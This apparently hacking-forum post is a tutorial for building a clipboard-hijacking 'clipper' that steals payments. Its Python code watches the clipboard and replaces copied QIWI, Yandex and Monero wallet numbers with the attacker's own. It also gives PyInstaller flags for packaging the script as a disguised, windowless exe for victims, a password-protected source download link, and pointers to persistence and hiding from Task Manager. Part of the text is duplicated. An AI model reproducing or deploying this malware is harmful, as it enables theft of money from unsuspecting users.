Hacker
Professional
- Messages
- 1,044
- Reaction score
- 812
- Points
- 113
Introduction
Clipper is a virus that monitors the clipboard of an infected PC for details of electronic wallets and, if such details are indicated, replaces the data in the buffer with those specified by the creator.
Using the example:
Let's assume that a clipper is dropped on your PC. For example, you need to pay for a service or make a transaction. You copy the wallet number (no matter what it is: crypt, poison, webmoney, qiwi). After you copy the wallet number, clipper will replace the copied wallet with the creator's wallet. The money flew off in an unknown direction and it is almost impossible to prove anything to anyone. PROFIT!
Let's move on to practice
Installing Python
Click on the link - I am a link. Download the latest version and install it.
Writing code
Importing the modules that we need:
Declaring variables
my_qiwi = ***QIWI***
my_yandex = ***YANDEX***
my_monero_poloniex = ***MONERO_POLONIEX***
Main part of the code
We compile it into an exe to feed our code to the victim
Let's use the PyInstaller program. It can be installed thanks to the command that we need to enter in CMD: pip install pyinstaller. Here are the Pyinstaller arguments that we will use:
1)- F, will collect all files in one exe file.
2)-w, disables the console.
3)-i ***path to the icon***, an argument that will connect the icon to the program.
Final command for CMD: pyinstaller-F -w-i * * * icon path*** * * * file path .py***.
You can also find the source code of scripts on the Internet that will add this virus to StartUp and hide it from the Task Manager.
Clipper is a virus that monitors the clipboard of an infected PC for details of electronic wallets and, if such details are indicated, replaces the data in the buffer with those specified by the creator.
Using the example:
Let's assume that a clipper is dropped on your PC. For example, you need to pay for a service or make a transaction. You copy the wallet number (no matter what it is: crypt, poison, webmoney, qiwi). After you copy the wallet number, clipper will replace the copied wallet with the creator's wallet. The money flew off in an unknown direction and it is almost impossible to prove anything to anyone. PROFIT!
Let's move on to practice
Installing Python
Click on the link - I am a link. Download the latest version and install it.
Writing code
Importing the modules that we need:
Code:
from win32clipboard import *
from time import sleep
import os
Declaring variables
my_qiwi = ***QIWI***
my_yandex = ***YANDEX***
my_monero_poloniex = ***MONERO_POLONIEX***
Main part of the code
Code:
while True: # Constant loop
OpenClipboard () # Opening the clipboard
data = GetClipboardData () # Reading data from the clipboard
CloseClipboard() # Close the clipboard (the rules are xD)
if len(data) == 12: # If the length is 12 characters, it is possible that this phone number EN
if (data.startswith("+79") or data.startswith("79") or data.startswith("89")): # If the text starts with "+79", "79", "89", then we change it
OpenClipboard () # Opening the clipboard
EmptyClipboard () # Clearing the clipboard
SetClipboardText (my_qiwi) # Changing the text
CloseClipboard () # Closing the clipboard
sleep(0.1) # Break, because if we constantly open the clipboard, the error will appear: "Access denied"
if len(data) == 15: # If the length is 15 characters, it is possible that this is the Yandex wallet number
OpenClipboard () # Opening the clipboard
EmptyClipboard () # Clearing the clipboard
SetClipboardText (my_yandex) # Changing the text
CloseClipboard () # Closing the clipboard
sleep(0.1) # Break, because if we constantly open the clipboard, an error will be thrown: "Access denied"
if data.startswith("4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk"): # If the text starts with "4JUdGzvrMFDWrUUwY3toJATSeNwjn54Lk", then this is exactly the Monero Poloniex wallet number
OpenClipboard () # Opening the clipboard
EmptyClipboard () # Clearing the clipboard
SetClipboardText(my_monero_poloniex) # Changing the text
CloseClipboard () # Closing the clipboard
sleep(0.1) # Break, because if we constantly open the clipboard, an error will be thrown: "Access denied"
We compile it into an exe to feed our code to the victim
Let's use the PyInstaller program. It can be installed thanks to the command that we need to enter in CMD: pip install pyinstaller. Here are the Pyinstaller arguments that we will use:
1)- F, will collect all files in one exe file.
2)-w, disables the console.
3)-i ***path to the icon***, an argument that will connect the icon to the program.
Final command for CMD: pyinstaller-F -w-i * * * icon path*** * * * file path .py***.
Source code
Download link: https://filecloud.me/ydcox8pbql7p.html
Password: h0peIess
You can also find the source code of scripts on the Internet that will add this virus to StartUp and hide it from the Task Manager.